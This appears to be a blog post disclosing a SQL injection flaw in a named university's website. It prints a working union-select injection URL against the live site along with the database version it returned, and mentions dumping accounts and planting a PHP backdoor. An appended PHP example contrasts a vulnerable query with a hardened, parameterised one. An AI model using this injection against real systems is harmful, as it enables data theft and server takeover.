Lums.edu.pk is Insecure
I have found a vulnerability in Lahore University Of Modern Sciences.
I heard it's a top leading university in Pakistan, and I feel very ashamed due to their insecure website.
I have notified the university management to secure it.
Proof of concept of the vulnerability:
http://lums.edu.pk/event_detail.php?id=317+and+1=0+union+select+1,2,version()--
This query shows you the MySQL version that is installed on their server:
5.0.32-Debian_7etch8-log
There are other queries as well through which an attacker can see their database tables and columns and dump account info.
With some methods, an attacker can even upload a PHP backdoor and root the server.
I hope they secure their site as soon as possible.
Good Bye.
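
The class of bug behind the `id` parameter above, next to its fix, as an added example that is not code from the original post or from the site. The `events` table, its columns and both function names are assumptions; the demo runs on an in-memory SQLite database through PDO, so `version()` is replaced with a string literal.

```php
<?php
// Added example. Hypothetical schema: the site's real code is not shown on the page.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec("INSERT INTO events VALUES (317, 'Open day', 'Constructed sample row')");

// Vulnerable pattern: the request value becomes part of the SQL text,
// so anything after the number is parsed as SQL.
function event_vulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT id, title, body FROM events WHERE id = $id";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: accept only a positive integer, then bind it as a
// parameter so the value can never change the statement's structure.
function event_hardened(PDO $pdo, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return []; // caller should answer with 400 or 404
    }
    $stmt = $pdo->prepare('SELECT id, title, body FROM events WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$inputs = [
    'normal' => '317',
    // URL-decoded shape of the parameter quoted in the post (constructed:
    // version() swapped for a literal because the demo database is SQLite).
    'union'  => "317 and 1=0 union select 1,2,'attacker-chosen'--",
];

foreach ($inputs as $label => $id) {
    printf("%-7s vulnerable: %s\n", $label, json_encode(event_vulnerable($pdo, $id)));
    printf("%-7s hardened:   %s\n", $label, json_encode(event_hardened($pdo, $id)));
}
```

The vulnerable function returns the row chosen by the injected `union select` for the second input, while the hardened one rejects that input before any query is built. Running the application's database account without `FILE` or write privileges limits what a missed injection can reach.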